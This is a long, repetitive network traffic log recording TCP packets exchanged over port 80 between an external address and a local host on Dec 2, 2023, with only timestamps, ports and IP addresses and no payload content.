                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122143030 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122154951 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122165918 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122174978 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122186899 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122199059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122210026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122220993 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122230053 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122234106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122267008 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122267962 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122287035 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122301102 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122313976 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122338057 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122390032 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122402906 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122414112 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122425079 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122428894 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122437954 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122451067 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122457027 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122463942 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122474909 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122503042 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122544050 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122558117 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122569084 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122581005 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122591972 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122605085 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122606993 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122617960 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122629881 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122632027 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122642994 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122651100 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122656107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122668028 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122670889 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122697115 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122713089 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122725964 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122737885 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122749090 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122752905 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122761965 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122773886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122782946 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122786999 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122797966 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122806072 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122809887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122822046 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122833967 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122860909 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122864962 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122878075 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122889042 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122906923 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122931004 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123017073 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123029947 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123042107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123054028 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123076916 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123100042 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123147011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123159885 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123171091 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123182058 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123193026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123199940 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123207092 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123218060 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123219967 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123241901 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123244047 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123286963 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123313904 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123327017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123337030 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123348951 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123364925 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123384953 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123424053 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123436928 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123447895 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123459101 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123485088 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123497963 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123503923 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123533010 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123544931 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123555899 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123572111 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123595953 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123687029 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123699903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123711109 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123723984 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123739004 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123764992 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123775959 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123790026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123830080 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123853922 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123867035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123878002 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123903036 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123908997 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123925924 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123938084 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123948097 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.123975039 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124001980 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124013901 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124025106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124037027 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124047995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124061108 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124072075 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124133110 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124146938 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124159098 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124176979 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124198914 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124247074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124259949 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124270916 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124283075 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124299049 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124310970 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124313116 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124360085 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124397993 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124424934 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124438047 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124449968 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124460936 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124476910 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124490976 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124501944 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124505043 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124541998 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124557018 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124593973 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124607086 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124629974 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124636889 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124660015 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124671936 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124690056 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124702930 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124713898 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124725103 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124752045 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124766111 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124805927 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124819040 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124830008 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124842882 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124867916 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.124867916 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125021935 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125036001 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125060081 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125123978 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125137091 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125149012 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125159979 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125166893 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125171900 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125183105 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125185966 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125195026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125205994 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125216961 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125219107 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125230074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125235081 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125252962 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125257969 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125266075 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125279903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125286102 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125329018 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125375032 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125462055 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125474930 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125488043 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125499010 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125499964 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125539064 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125571966 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125585079 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125596046 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125607967 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125611067 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125618935 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125631094 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125641108 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125643015 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125664949 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125669956 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125678062 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125689030 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125724077 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125777006 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125790119 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125801086 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125827074 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125844002 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125855923 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125868082 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125880957 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125881910 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125905991 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125931978 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125945091 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.125972986 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126003981 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126017094 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126029015 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126041889 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126066923 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126075983 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126128912 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126142025 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126166105 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126178980 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126235962 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126235962 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126250029 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126261950 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126272917 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126286030 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126287937 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126298904 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126316071 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126343012 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126353979 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126367092 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126386881 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126399040 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126410961 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126441956 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126514912 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126529932 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126558065 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126570940 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126629114 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126642942 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126667023 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126724958 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126738071 CET804972091.215.85.17192.168.2.6
